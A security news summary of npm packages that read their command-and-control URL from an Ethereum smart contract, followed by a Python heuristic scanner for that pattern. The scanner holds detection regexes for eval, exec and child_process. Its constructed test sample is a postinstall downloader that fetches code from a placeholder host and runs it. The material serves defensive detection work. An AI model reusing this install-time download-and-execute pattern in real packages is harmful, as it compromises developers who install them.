Ethereum smart contracts used to push malicious code on npm

ReversingLabs uncovered two npm packages, colortoolsv2 and mimelib2, that use Ethereum smart contracts to hide where their malicious payload comes from. The packages act as downloaders: instead of hard-coding the command-and-control (C2) server address, they read the URL from a smart contract and then fetch the next stage from it. Storing the URL on-chain helps evade static inspection, since the package contains no suspicious URL and its network traffic looks like an ordinary blockchain query, and the attacker can change the download location by updating contract state without republishing the package. The packages are part of a broader npm/GitHub campaign that uses social engineering to lure developers into installing them, and the campaign raises the risk for developers of cryptocurrency software in particular. ReversingLabs urges scanning packages for such behaviour before installation and points to tools like Spectra Assure Community for protection.
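The technique described above leaves a recognisable footprint in an npm package: an install-time lifecycle script, a blockchain client library used to read contract state, and download-and-execute logic in the same reachable code. The scanner below, an added illustration and not ReversingLabs' tooling, applies that heuristic to a package's files. The two sample packages, their file contents, the contract address and the RPC URL are all constructed for the demo and are not taken from the real colortoolsv2 or mimelib2 packages.

```python
"""
Heuristic scanner for the npm downloader pattern: an install-time lifecycle
script that reads a URL from a smart contract, fetches a second stage from it
and executes the result. Added illustration only; all sample packages below
are constructed for the demo.
"""
import json
import re

# Indicator groups. A group fires if any of its regexes matches in any JS file
# reachable from an install-time lifecycle script.
CHAIN_READ = [
    r"\bfrom\s+['\"](ethers|web3)['\"]",                 # ESM import of a chain client
    r"require\(\s*['\"](ethers|web3)['\"]\s*\)",          # CommonJS require of a chain client
    r"new\s+\w*\.?Contract\(",                            # contract object construction
    r"\.(call|getData|read)\s*\(",                        # raw contract read
]
REMOTE_FETCH = [r"\bfetch\s*\(", r"\bhttps?\.get\s*\(", r"\baxios\.", r"\brequest\s*\("]
EXECUTE = [
    r"\beval\s*\(", r"new\s+Function\s*\(", r"child_process",
    r"\b(spawn|exec|execSync)\s*\(", r"\bvm\.run",
]
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")


def _hits(patterns, text):
    """Return the indicator regexes that match the text."""
    return [p for p in patterns if re.search(p, text)]


def lifecycle_entry_files(package_json):
    """JS files referenced by install-time lifecycle scripts in package.json."""
    scripts = json.loads(package_json).get("scripts", {})
    files = set()
    for hook in LIFECYCLE:
        files.update(re.findall(r"[\w./-]+\.[cm]?js\b", scripts.get(hook, "")))
    return files


def classify(finding):
    """Severity from which indicator groups fired in lifecycle-reachable code."""
    if not finding["lifecycle_files"]:
        return "clean"
    if finding["chain_read"] and finding["remote_fetch"] and finding["execute"]:
        return "high"      # full pattern: contract read -> download -> execute at install
    if finding["remote_fetch"] and finding["execute"]:
        return "medium"    # download-and-run at install, no chain indirection
    if finding["chain_read"] or finding["remote_fetch"] or finding["execute"]:
        return "low"
    return "clean"


def scan_package(files):
    """files: {relative path: content}. Returns indicator hits plus a severity."""
    entry = lifecycle_entry_files(files.get("package.json", "{}"))
    # Only code reachable from a lifecycle hook matters; follow one level of
    # relative require() so a loader split into a helper module is still seen.
    reachable = set(entry)
    for f in entry:
        for dep in re.findall(r"require\(\s*['\"](\./[\w./-]+)['\"]\s*\)", files.get(f, "")):
            dep = dep[2:] if dep.startswith("./") else dep
            reachable.add(dep if dep.endswith(".js") else dep + ".js")
    combined = "\n".join(files.get(f, "") for f in sorted(reachable))
    finding = {
        "lifecycle_files": sorted(entry),
        "scanned_files": sorted(reachable),
        "chain_read": _hits(CHAIN_READ, combined),
        "remote_fetch": _hits(REMOTE_FETCH, combined),
        "execute": _hits(EXECUTE, combined),
    }
    finding["severity"] = classify(finding)
    return finding


# Constructed sample: mimics the described pattern with a placeholder contract
# address and an unroutable RPC host. Not the real packages' code.
SUSPICIOUS = {
    "package.json": '{"name": "demo-color-utils", "version": "1.0.0", '
                    '"scripts": {"postinstall": "node install.js"}}',
    "install.js": r'''
const { ethers } = require("ethers");
const { runStage } = require("./lib/loader.js");
async function main() {
  const provider = new ethers.JsonRpcProvider("http://rpc.invalid");
  const c = new ethers.Contract("0x0000000000000000000000000000000000000000",
    ["function getConfig() view returns (string)"], provider);
  runStage(await c.getConfig());   // URL comes from chain state, not the package
}
main();
''',
    "lib/loader.js": r'''
const https = require("https");
const { execSync } = require("child_process");
function runStage(url) {
  https.get(url, (res) => { let b = ""; res.on("data", d => b += d);
    res.on("end", () => { require("fs").writeFileSync("stage.js", b); execSync("node stage.js"); }); });
}
module.exports = { runStage };
''',
}

# Constructed benign sample: no install-time hooks, so nothing is reachable.
BENIGN = {
    "package.json": '{"name": "demo-mime-utils", "version": "1.0.0", '
                    '"scripts": {"test": "node test.js"}}',
    "index.js": 'module.exports = { lookup: (ext) => ({ json: "application/json" })[ext] };',
}

if __name__ == "__main__":
    for name, pkg in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, scan_package(pkg)["severity"])
```

The heuristic is deliberately narrow: it only inspects code reachable from lifecycle hooks, which is where a package gets to run without the developer ever calling it, and it rates the combination of chain read, remote fetch and execution higher than any one indicator alone. A real scan should also walk nested requires, dynamic `require(variable)` calls and minified or obfuscated sources, which this demo does not attempt.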